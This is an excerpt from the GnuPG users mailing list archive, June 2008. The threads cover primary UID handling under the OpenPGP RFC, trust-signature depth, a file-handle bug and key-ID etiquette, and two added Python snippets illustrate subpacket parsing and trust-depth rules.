From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Mon, 16 Jun 2008 16:11:04 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48558829.7060504@sixdemonbag.org> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> Message-ID: <48567478.4020201@gmail.com> Robert J. Hansen wrote: > There are five answers here: > > (a) This is a PGP question, not a GnuPG question. So any question on compatibility should be sent to the PGP forum? :) > (b) GnuPG is performing correctly. > (c) PGP is performing correctly. Great.. > (d) Implementations are given leeway in deciding how to interpret a > primary userID. Interesting. I assume there is a good reason for this? I mean, does it not defeat the purpose of primary uid's if they are not recognized between different software? > (e) This behavior is not a bug, much less a ridiculous one. Well, at the time it was absolutely clear to me that it was a bug in PGP, since it would just be another one on the list(And yes, many of the bugs in PGP are ridiculous) Guess i was just wrong on this one. From rjh at sixdemonbag.org Mon Jun 16 17:23:17 2008 
From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 10:23:17 -0500 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48567478.4020201@gmail.com> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> Message-ID: <48568565.10609@sixdemonbag.org> Jorgen Lysdal wrote: > So any question on compatibility should be sent to the PGP forum? :) No. If you have a key created in PGP that's not working in GnuPG, by all means, ask here "hey, what's going on?" If you have a key created in GnuPG that's not working in PGP, you should probably be asking there. Or, generally speaking, ask the people who have detailed interior knowledge of the system which appears to not be working right. > Interesting. I assume there is a good reason for this? I mean, does it > not defeat the purpose of primary uid's if they are not recognized > between different software? No, it doesn't defeat the purpose of a primary UID. Which UID is "primary" is strictly a matter for the convenience of human beings. OpenPGP doesn't draw that distinction. It's totally irrelevant to the system. The totality of the OpenPGP language on user IDs is such: 5.2.3.19. Primary User ID (1 octet, Boolean) This is a flag in a User ID's self-signature that states whether this User ID is the main User ID for this key. It is reasonable for an implementation to resolve ambiguities in preferences, etc. by referring to the primary User ID. If this flag is absent, its value is zero. If more than one User ID in a key is marked as primary, the implementation may resolve the ambiguity in any way it sees fit, but it is RECOMMENDED that priority be given to the User ID with the most recent self-signature. When appearing on a self-signature on a User ID packet, this subpacket applies only to User ID packets. When appearing on a self-signature on a User Attribute packet, this subpacket applies only to User Attribute packets. 
That is to say, there are two different and independent "primaries" -- one for User IDs, and one for User Attributes. ... There are a couple of other quick offhanded references (packet specifiers, one reference to how a symmetric algorithm may be chosen, etc.), but that's the meat of it. There is no MUST anywhere in that paragraph. Implementations are therefore free to do whatever they like with it, including ignore your preference and arbitrarily say "okay, we're going to treat this other one as your primary". From wk at gnupg.org Mon Jun 16 17:31:42 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 16 Jun 2008 17:31:42 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48567478.4020201@gmail.com> (Jorgen Lysdal's message of "Mon, 16 Jun 2008 16:11:04 +0200") References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> Message-ID: <87zlpl4crl.fsf@wheatstone.g10code.de> On Mon, 16 Jun 2008 16:11, j.lysdal at gmail.com said: > Well, at the time it was absolutely clear to me that it was a bug in > PGP, since it would just be another one on the list(And yes, many of the > bugs in PGP are ridiculous) Guess i was just wrong on this one. The RFC states this: 5.2.3.19. Primary User ID (1 octet, Boolean) This is a flag in a User ID's self-signature that states whether this User ID is the main User ID for this key. It is reasonable for an implementation to resolve ambiguities in preferences, etc. by referring to the primary User ID. If this flag is absent, its value [...] Thus there is no requirement to care about this flag. Nevertheless it is a pretty useful information and in particular useful if you are able to change algorithm preferences - without that flag there would be no clean way to keep one user IDs displayed first. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From j.lysdal at gmail.com Mon Jun 16 17:51:42 2008 
From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Mon, 16 Jun 2008 17:51:42 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48568565.10609@sixdemonbag.org> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> <48568565.10609@sixdemonbag.org> Message-ID: <48568C0E.7010701@gmail.com> Robert J. Hansen wrote: > Jorgen Lysdal wrote: >> So any question on compatibility should be sent to the PGP forum? :) > > No. If you have a key created in PGP that's not working in GnuPG, by > all means, ask here "hey, what's going on?" > > If you have a key created in GnuPG that's not working in PGP, you should > probably be asking there. > > Or, generally speaking, ask the people who have detailed interior > knowledge of the system which appears to not be working right. I get what you are saying, my fault. However, to the answers you gave to my question, the implementations does not really matter. > No, it doesn't defeat the purpose of a primary UID. Which UID is > "primary" is strictly a matter for the convenience of human beings. > OpenPGP doesn't draw that distinction. It's totally irrelevant to the > system. > > The totality of the OpenPGP language on user IDs is such: > > > 5.2.3.19. Primary User ID > > (1 octet, Boolean) > > This is a flag in a User ID's self-signature that states whether this > User ID is the main User ID for this key. It is reasonable for an > implementation to resolve ambiguities in preferences, etc. by > referring to the primary User ID. If this flag is absent, its value > is zero. If more than one User ID in a key is marked as primary, the > implementation may resolve the ambiguity in any way it sees fit, but > it is RECOMMENDED that priority be given to the User ID with the most > recent self-signature. > > When appearing on a self-signature on a User ID packet, this > subpacket applies only to User ID packets. 
When appearing on a > self-signature on a User Attribute packet, this subpacket applies > only to User Attribute packets. That is to say, there are two > different and independent "primaries" -- one for User IDs, and one > for User Attributes. > > > ... There are a couple of other quick offhanded references (packet > specifiers, one reference to how a symmetric algorithm may be chosen, > etc.), but that's the meat of it. > > There is no MUST anywhere in that paragraph. Implementations are > therefore free to do whatever they like with it, including ignore your > preference and arbitrarily say "okay, we're going to treat this other > one as your primary". > > Got it! Thanks From ivan.peev at gmail.com Sun Jun 15 17:36:47 2008 
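The section 5.2.3.19 text quoted in this thread, worked through as an added example that is not part of any message on the list and is not GnuPG or PGP code. It parses a self-signature's subpacket area, reads the Primary User ID flag (absent means zero), and applies the RECOMMENDED tie-break; the user IDs, timestamps and function names are constructed for illustration.

```python
import struct

# Signature subpacket types from RFC 4880, section 5.2.3.1.
SIG_CREATION_TIME = 2
PRIMARY_USER_ID = 25


def parse_subpackets(area):
    """Split a signature subpacket area into {type: body}."""
    found, pos = {}, 0
    while pos < len(area):
        first = area[pos]
        if first < 192:                        # one-octet length
            length, pos = first, pos + 1
        elif first < 255:                      # two-octet length
            if pos + 2 > len(area):
                raise ValueError("truncated subpacket length")
            length = ((first - 192) << 8) + area[pos + 1] + 192
            pos += 2
        else:                                  # 0xFF, then four-octet length
            if pos + 5 > len(area):
                raise ValueError("truncated subpacket length")
            length = struct.unpack(">I", area[pos + 1:pos + 5])[0]
            pos += 5
        # The length counts the type octet, so it is at least 1.
        if length < 1 or pos + length > len(area):
            raise ValueError("subpacket runs past end of area")
        sp_type = area[pos] & 0x7F             # bit 7 is the "critical" flag
        found[sp_type] = area[pos + 1:pos + length]
        pos += length
    return found


def selfsig_facts(area):
    """Return (creation_time, primary_flag) for one self-signature."""
    sp = parse_subpackets(area)
    raw_time = sp.get(SIG_CREATION_TIME, b"\x00\x00\x00\x00")
    if len(raw_time) != 4:
        raise ValueError("creation time must be 4 octets")
    # "If this flag is absent, its value is zero."
    flag = sp.get(PRIMARY_USER_ID, b"\x00")
    return struct.unpack(">I", raw_time)[0], any(flag)


def resolve_primary(uids):
    """uids: list of (user_id, subpacket_area) in key order."""
    facts = [(uid,) + selfsig_facts(area) for uid, area in uids]
    flagged = [f for f in facts if f[2]]
    if not flagged:
        return None          # nothing marked: the choice is the implementation's
    # Several marked: RECOMMENDED (not MUST) is the most recent self-signature.
    return max(flagged, key=lambda f: f[1])[0]


def oldest_first(uids):
    """A display order that ignores the flag, as reported in the thread."""
    return [uid for uid, area in
            sorted(uids, key=lambda u: selfsig_facts(u[1])[0])]


# --- constructed sample data below (not taken from any real key) ---
def make_subpacket(sp_type, body):
    return bytes([len(body) + 1, sp_type]) + body


def make_selfsig(created, primary=None, critical=False):
    area = make_subpacket(SIG_CREATION_TIME, struct.pack(">I", created))
    if primary is not None:
        sp_type = PRIMARY_USER_ID | (0x80 if critical else 0)
        area += make_subpacket(sp_type, bytes([primary]))
    return area


SAMPLE_KEY = [
    ("Alice Example <alice@old.example>", make_selfsig(1100000000)),
    ("Alice Example <alice@work.example>", make_selfsig(1150000000, primary=1)),
    ("Alice Example <alice@home.example>",
     make_selfsig(1200000000, primary=1, critical=True)),
    ("Alice Example <alice@list.example>", make_selfsig(1210000000, primary=0)),
]

if __name__ == "__main__":
    print("flag-aware choice :", resolve_primary(SAMPLE_KEY))
    print("oldest-first shows:", oldest_first(SAMPLE_KEY)[0])
```

Both results are permitted by the quoted text, which is why the same key can show a different first user ID in two conforming programs.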
From: ivan.peev at gmail.com (Ivan Peev) Date: Sun, 15 Jun 2008 11:36:47 -0400 Subject: Remove public key from secret key In-Reply-To: <48551C98.3070809@digitalbrains.com> References: <48551C98.3070809@digitalbrains.com> Message-ID: Thank you for the verbose answer Peter. What I actually ended up doing is simply signing the required data with a private key and verifying the signed data with the public key on the exposed machine. I realized I don't need encryption, but a way to guarantee the data is generated by me. Thank you again for your time. Regards, Ivan On Sun, Jun 15, 2008 at 9:43 AM, Peter Lebbing wrote: > Ivan Peev wrote: > > Is there a way to export the secret key without the public key or remove > > the public key from exported secret key? I'm trying the following > scenario: > > > > 1. Encrypt data with particular public key on one machine. > > 2. Decrypt data with related secret key on another machine. > > > > Basically I don't want someone to be able to generate data, which can be > > decrypted with the related secret key. > > At least with RSA, the public key can be computed with just the secret key. > So it would never be cryptographically secure, it only takes some effort on > the part of the attacker to break the scheme. > > I obviously don't know your exact requirements, but instead of trying to > make something designed to be public private, perhaps this will accomplish > your goal: > > Create two keypairs, A and B. > > The machine mentioned under point 1. above has the public key of keypair A > and the private key of keypair B. > > The machine mentioned under point 2. has the private key A and public key > B. > > The program encrypting on machine 1. encrypts to key A and signs with key > B. > > The program decrypting on machine 2. only accepts data encrypted to key A > and /signed with key B/. > > Now someone with access to the keyring on machine 2. 
 cannot create > encrypted > data that is accepted by the decryption program, because he cannot sign it > with key B. > > HTH, > > Peter Lebbing. > > -- > I'm using the GNU Privacy Guard (GnuPG) in combination with Enigmail. > You can send me encrypted mail if you want some privacy. > My key is available at http://wwwhome.ewi.utwente.nl/~lebbing/pubkey.txt > From hv at tbz-pariv.de Mon Jun 16 10:24:56 2008 From: hv at tbz-pariv.de (Thomas Guettler) Date: Mon, 16 Jun 2008 10:24:56 +0200 Subject: Bug: --encrpyt-files: too many open files Message-ID: <48562358.8060201@tbz-pariv.de> Hi, there is a bug in 2.0.4: find -type f | LANG=C gpg -r someid --homedir ~/... --encrypt-files ... gpg: encryption of `/home/a/.../myfileN' failed: Too many open files You can look at the stale open files under Linux (The encryption process must be still running): ls -l /proc/PID/fd lr-x------ 1 a a 64 16. Jun 10:14 97 -> /home/a/.../myfile1 lr-x------ 1 a a 64 16. Jun 10:14 98 -> /home/a/.../myfile2 ... gpg (GnuPG) 2.0.4-svn0 (SuSE 10.3) Can someone check if this happens in the latest release, too? Please CC to me, I am not on the list. Thomas -- Thomas Guettler, http://www.thomas-guettler.de/ From rick at rickv.com Mon Jun 16 19:01:23 2008 
From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 13:01:23 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48555FF8.8060705@gmail.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> Message-ID: <48569C63.2010401@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: | Well, I suppose in most "civilized" countries you have the right to | have access to a lawyer if you have legal troubles. But is it a good | idea to keep in mind there are places where that is unlikely to work... Ah, and there's the fatal flaw -- not the part about "civilized" countries, but simply "country." Airport immigration and customs is viewed as outside the borders, a middle ground where the laws of the destination nation don't apply. Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 rickv.com/publickey.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWnGIACgkQhHTA8gi5MvCEDQD/XgeNrHeuQO2H6N3VP2eoxWfH x0LNBpqn0aIfPJo7e1cA/0YLQQTD1DSAErdmnSQAO7C5dHI5LE23MEerkGiSFF0J =ggIG -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Mon Jun 16 19:57:47 2008 
From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 12:57:47 -0500 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48569C63.2010401@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> Message-ID: <4856A99B.5010406@sixdemonbag.org> Rick Valenzuela wrote: > Ah, and there's the fatal flaw -- not the part about "civilized" > countries, but simply "country." Airport immigration and customs is > viewed as outside the borders, a middle ground where the laws of the > destination nation don't apply. [sighs] This is not true. There is no "middle ground" at borders. It is still the land of whatever sovereign nation it stands upon. That sovereign nation may, for purposes of its own domestic law, treat the airport differently than surrounding areas -- but it's grossly inaccurate to say that an airport is beyond the laws of the host country. From rick at rickv.com Mon Jun 16 20:30:40 2008 
From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 14:30:40 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856A99B.5010406@sixdemonbag.org> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> Message-ID: <4856B150.4020704@rickv.com> Robert J. Hansen wrote: > it's grossly inaccurate to say that an airport > is beyond the laws of the host country. I said it's "viewed as." It's an interpretation and being taken advantage of as such. I might've tended toward hyperbole and implied an uncivilized Wild West of airports, but for some specific instances, yes, basic expected rights are sometimes no longer operable pre-entry. For instance, in the U.S., if a non-citizen is being questioned about entry status, he or she is not entitled to have an attorney present. (A U.S. citizen is, for any questioning.) Yet, if a noncitizen is detained in the city, he can have a lawyer present for questioning by police. From rick at rickv.com Mon Jun 16 21:30:32 2008 
From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 15:30:32 -0400 Subject: info in sigs, comments and header Message-ID: <4856BF58.9030400@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 I have a question about style, etiquette, and practicality with disseminating GnuPG info in an email. Hope this question isn't too silly, but I assume that over years of use, general customs have developed, and I have no idea what they are. Is there any customary practice for including GnuPG/PGP information in an email -- whether to put it in your sig file, or in the comments of your GnuPG signature? Is it useful (or preferred) to have the GnuPG version in the GnuPG signature comment, or frowned on to use/not use the comment from Enigmail or FireGPG? I'm playing around with my email sig now, wondering what to include, but aiming for something short, useful and not redundant or "tacky." It feels silly to put my keyID and a URL to my public key there and also have it tucked away nicely in the header, but who looks in headers? (For all I know, having that in header information is useful for other people's spam filters.) I had a link to my public key in the GnuPG signature comment, but then just moved it to my sig. I made a DSA signing key partly because I wanted a relatively short signature, so I thought it was better to leave that block mess as short as possible. I didn't include a fingerprint, figuring instead to put that on new business cards. I did do a search for this, and the best I found dealt mainly with forum postings and lists: http://marc.info/?l=gnupg-users&m=99530793817456&w=2 What are your practices for this? Is anything seen as useless or gauche? 
Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWv1gACgkQhHTA8gi5MvBDHQEAy19nTXjrn3WThj8deVU5rhls 8w6xRsVff9+Ii7KsgcEA/R4P881K7uSFqUnU1ZO49JdzAS6pOsrDv962S+LClzaM =zjJm -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Mon Jun 16 21:37:20 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 14:37:20 -0500 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856B150.4020704@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> Message-ID: <4856C0F0.9070306@sixdemonbag.org> Rick Valenzuela wrote: > I said it's "viewed as." It's an interpretation and being taken > advantage of as such. I might've tended toward hyperbole and implied an > uncivilized Wild West of airports, but for some specific instances, yes, > basic expected rights are sometimes no longer operable pre-entry. Keeping this jurisdiction-free, the legal protections people think they should have and the legal protections they think they have and the legal protections they actually have are three quite disjoint subject areas. It pays to keep this in mind when making statements. Clarity is important when discussing things. Without clarity, the process of reasoning is stymied. My objection is not to your political beliefs or your ideas about what rights are possessed by Americans. My objection is strictly one of clarity. From rjh at sixdemonbag.org Mon Jun 16 21:44:06 2008 
From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 14:44:06 -0500 Subject: info in sigs, comments and header In-Reply-To: <4856BF58.9030400@rickv.com> References: <4856BF58.9030400@rickv.com> Message-ID: <4856C286.6000100@sixdemonbag.org> Rick Valenzuela wrote: > Is there any customary practice for including GnuPG/PGP information in > an email -- whether to put it in your sig file, or in the comments of > your GnuPG signature? Is it useful (or preferred) to have the GnuPG > version in the GnuPG signature comment, or frowned on to use/not use the > comment from Enigmail or FireGPG? If you use Enigmail, you can tell Enigmail to add an email header indicating your OpenPGP key id. This seems to be about as low-intrusive a method as any. > but who looks in headers? Technically savvy people -- which happens to be the same demographic which tends to use OpenPGP, unfortunately enough. OpenPGP's penetration into the layman's world of computing is practically nil. > What are your practices for this? Is anything seen as useless or gauche? A brief "OpenPGP: 0xDEADBEEF" is probably not going to get you any hate mail. I run my key fingerprint across the bottom of my business cards. That way when I meet someone, we trade information and they now have a trusted copy of my fingerprint, delivered directly from my hand. Since I work in a very technical field, most people who get my card understand what it is -- it's been a conversational icebreaker at several conventions. It's also very handy for impromptu keysigning parties. A couple of weeks ago I was sitting in a coffeeshop with a Canadian doctoral student in CS, a sysadmin for kernel.org, and a couple of fellow voting researchers. I put my passport and a stack of business cards on the table, and presto, everyone had the opportunity to confirm my identity and get a copy of my fingerprint. 
It was a lot more convenient than if I'd had to say "hold on a second...", boot up my laptop, grab a stack of napkins, and laboriously hand-copy my fingerprint from a terminal window onto napkins again and again for each person who was sitting at the table. From george.davidescu at gmail.com Mon Jun 16 22:14:52 2008 
From: george.davidescu at gmail.com (bezna) Date: Mon, 16 Jun 2008 13:14:52 -0700 (PDT) Subject: Questions about trust signatures In-Reply-To: <20080613214255.GD4107@jabberwocky.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> Message-ID: <17872484.post@talk.nabble.com> Dear David, First, thank you for your reply and for the working link to the white paper. You have my enormous gratitude for taking the time to share your knowledge with me. David Shaw wrote: > >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own >> purposes), the chain of trust linking Eve to Alice would be broken >> since GPG computes certificate validity (and trust in the case of >> tsigns) only down paths where each next node in the path was tsigned >> with a lower "depth" than the "depth" of the tsign on the >> node before it. > > The chain isn't broken, the depth at each step is just lowered to > match the perspective of the head of the chain (Alice in this case). > If Bob tsigns Carmen, then from Bob's perspective, that chain in the > link had a depth of 4. Similarly, if Roger signs Bob's key with a > depth of 5, then we have a new chain from Roger's perspective where > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it > is lowered to match the maximum depth granted by Roger). If Roger > signed Bob's key with a depth of 50, then the Bob->Carmen link has a > depth of 4 (as it can't be larger than what Bob granted). > I believe you might be mistaken on this point. I ran some trials and it seems that if the next trust signature in the chain has a higher depth than the one preceding it, it is treated just as a regular signature (depth 0) and the trust data contained in the signature is discarded, effectively breaking the chain. The next hop in the chain will have an appropriate trust value of "undefined", and the one following it will simply be "unknown". See for yourself:

A nice "continuous" chain of tsigs of descending order:
-------------------------------------------
pub   1024D/B2D7B73D 2008-06-10
uid       [ultimate] Alice
sig 3        B2D7B73D 2008-06-10  Alice
sub   2048g/D4380BAE 2008-06-10
sig          B2D7B73D 2008-06-10  Alice

pub   1024D/87E9321A 2008-06-10
uid       [  full  ] Bobby
sig 3        87E9321A 2008-06-10  Bobby
sig 3    3   B2D7B73D 2008-06-16  Alice
sub   2048g/E88071D6 2008-06-10
sig          87E9321A 2008-06-10  Bobby

pub   1024D/0C73E6E9 2008-06-10
uid       [  full  ] Carlos
sig 3        0C73E6E9 2008-06-10  Carlos
sig 3    2   87E9321A 2008-06-16  Bobby
sub   2048g/4EE6F059 2008-06-10
sig          0C73E6E9 2008-06-10  Carlos

pub   1024D/026D69FA 2008-06-10
uid       [  full  ] David
sig 3        026D69FA 2008-06-10  David
sig 3    1   0C73E6E9 2008-06-16  Carlos
sub   2048g/D9A7D20C 2008-06-10
sig          026D69FA 2008-06-10  David

pub   1024D/1D764C2F 2008-06-10
uid       [  full  ] Elena
sig 3        1D764C2F 2008-06-10  Elena
sig 3        026D69FA 2008-06-16  David
sub   2048g/8829A23F 2008-06-10
sig          1D764C2F 2008-06-10  Elena

And now a chain with a tsig of 4 at the Bobby==>Carlos link, as described in the earlier post, which apparently generates an interruption in the chain of trust:
----------------------------------------
pub   1024D/B2D7B73D 2008-06-10
uid       [ultimate] Alice
sig 3        B2D7B73D 2008-06-10  Alice
sub   2048g/D4380BAE 2008-06-10
sig          B2D7B73D 2008-06-10  Alice

pub   1024D/87E9321A 2008-06-10
uid       [  full  ] Bobby
sig 3        87E9321A 2008-06-10  Bobby
sig 3    3   B2D7B73D 2008-06-16  Alice
sub   2048g/E88071D6 2008-06-10
sig          87E9321A 2008-06-10  Bobby

pub   1024D/0C73E6E9 2008-06-10
uid       [  full  ] Carlos
sig 3        0C73E6E9 2008-06-10  Carlos
sig 3    4   87E9321A 2008-06-16  Bobby
sub   2048g/4EE6F059 2008-06-10
sig          0C73E6E9 2008-06-10  Carlos

pub   1024D/026D69FA 2008-06-10
uid       [ undef  ] David
sig 3        026D69FA 2008-06-10  David
sig 3    1   0C73E6E9 2008-06-16  Carlos
sub   2048g/D9A7D20C 2008-06-10
sig          026D69FA 2008-06-10  David

pub   1024D/1D764C2F 2008-06-10
uid       [ unknown] Elena
sig 3        1D764C2F 2008-06-10  Elena
sig 3        026D69FA 2008-06-16  David
sub   2048g/8829A23F 2008-06-10
sig          1D764C2F 2008-06-10  Elena

Curious stuff. What do you think? George -- View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17872484.html Sent from the GnuPG - User mailing list archive at Nabble.com. From rick at rickv.com Mon Jun 16 22:21:25 2008 
From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 16:21:25 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856C0F0.9070306@sixdemonbag.org> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> Message-ID: <4856CB45.7070308@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Robert J. Hansen wrote: | Keeping this jurisdiction-free, the legal protections people think they | should have and the legal protections they think they have and the legal | protections they actually have are three quite disjoint subject areas. | It pays to keep this in mind when making statements. | | My objection is not to your political beliefs or your ideas about what | rights are possessed by Americans. My objection is strictly one of clarity. Sorry for the confusion. Clarity is good, yes, but what I was saying is that practicality is good, too. Add to the disjointed subject areas the legal protections that people are going to get. Those could differ because some areas are unwritten as law or regulation, or various interpretations of existing law have not been fully tested in court. I wasn't trying to push my politics. I was just highlighting that a gray area could exist, and that this kind of interpretation is not limited to whether a country is civilized or not. Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWy0QACgkQhHTA8gi5MvDc7wEAmMUYGychjDYNrnetZynzf+3+ YGr02YUmfm7J0+yE9d0A/3uJZZZKpeTJk44x0TSQZWW4fzrwboPUwpUOx/+BAupg =kcgq -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Mon Jun 16 23:02:12 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 16 Jun 2008 17:02:12 -0400 Subject: Questions about trust signatures In-Reply-To: <17872484.post@talk.nabble.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> Message-ID: <20080616210212.GB14148@jabberwocky.com> On Mon, Jun 16, 2008 at 01:14:52PM -0700, bezna wrote: > > Dear David, > > First, thank you for your reply and for the working link to the white paper. > You have my enormous gratitude for taking the time to share your knowledge > with me. > > > David Shaw wrote: > > > >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own > >> purposes), the chain of trust linking Eve to Alice would be broken > >> since GPG computes certificate validity (and trust in the case of > >> tsigns) only down paths where each next node in the path was tsigned > >> with a lower "depth" than the "depth" of the tsign on the > >> node before it. > > > > The chain isn't broken, the depth at each step is just lowered to > > match the perspective of the head of the chain (Alice in this case). > > If Bob tsigns Carmen, then from Bob's perspective, that chain in the > > link had a depth of 4. Similarly, if Roger signs Bob's key with a > > depth of 5, then we have a new chain from Roger's perspective where > > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key > > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it > > is lowered to match the maximum depth granted by Roger). If Roger > > signed Bob's key with a depth of 50, then the Bob->Carmen link has a > > depth of 4 (as it can't be larger than what Bob granted). > > > > I believe you might be mistaken on this point. 
I ran some trials and it > seems that if the next trust signature in the chain has a higher depth than > the one preceding it, it is treated just as a regular signature (depth 0) > and the trust data contained in the signature is discarded, effectively > breaking the chain. The next hop in the chain will have an appropriate trust > value of "undefined", and the one following it will simply be "unknown". See > for yourself: Interesting. I'm going to have to go back to my notes from when I wrote that code back in 2002, and see what I was shooting for. My memory is that I wanted the trust depth to automatically degrade as the chain continued. It's possible this is just a bug, or it is possible I did it this way on purpose (PGP compatibility, maybe?) I'll let you know what I find. David From faramir.cl at gmail.com Tue Jun 17 06:02:45 2008 
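The two readings of trust-signature depth in this exchange, put side by side as an added toy model; it is not GnuPG's trust code and is not from either poster. "clamp" follows David Shaw's description (depth lowered to what the signer may still delegate), "discard" follows George's reported trials (a tsig that is not lower than the preceding one counts as an ordinary signature). Full trust on every tsig and the treatment of equal depths are assumptions.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Sig:
    signer: str
    signee: str
    depth: int = 0      # trust-signature depth; 0 = ordinary signature


def effective_depth(declared, signer_depth, policy):
    """Depth the signee ends up with, given what its signer holds."""
    limit = signer_depth - 1            # each hop uses up one level
    if declared <= limit:
        return declared                 # both readings agree here
    if policy == "clamp":               # description in David Shaw's reply
        return max(limit, 0)
    if policy == "discard":             # behaviour George reports
        return 0                        # assumption: equal depth also lands here
    raise ValueError("unknown policy: %r" % policy)


def walk_chain(chain, policy):
    """Evaluate a linear chain that starts at the ultimately trusted key.

    Returns [(signee, validity, effective_depth), ...].
    """
    results = []
    signer, signer_valid, signer_depth = chain[0].signer, True, math.inf
    for sig in chain:
        if sig.signer != signer:
            raise ValueError("chain is not linked at %s" % sig.signer)
        if not signer_valid:
            validity, depth = "unknown", 0    # signed by a key we cannot rely on
        elif signer_depth < 1:
            validity, depth = "undef", 0      # signer valid, but no introducer
        else:
            validity = "full"
            depth = effective_depth(sig.depth, signer_depth, policy)
        results.append((sig.signee, validity, depth))
        signer, signer_valid, signer_depth = sig.signee, validity == "full", depth
    return results


# The two chains from George's listings (names and depths from the thread).
DESCENDING = [
    Sig("Alice", "Bobby", 3), Sig("Bobby", "Carlos", 2),
    Sig("Carlos", "David", 1), Sig("David", "Elena", 0),
]
WITH_DEPTH_4 = [
    Sig("Alice", "Bobby", 3), Sig("Bobby", "Carlos", 4),
    Sig("Carlos", "David", 1), Sig("David", "Elena", 0),
]

if __name__ == "__main__":
    for name, chain in (("descending", DESCENDING), ("depth 4", WITH_DEPTH_4)):
        for policy in ("clamp", "discard"):
            print(name, policy, walk_chain(chain, policy))
```

Only the "discard" reading reproduces the `[ undef ]` David and `[ unknown]` Elena of the second listing; under "clamp" every key in both chains stays valid.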
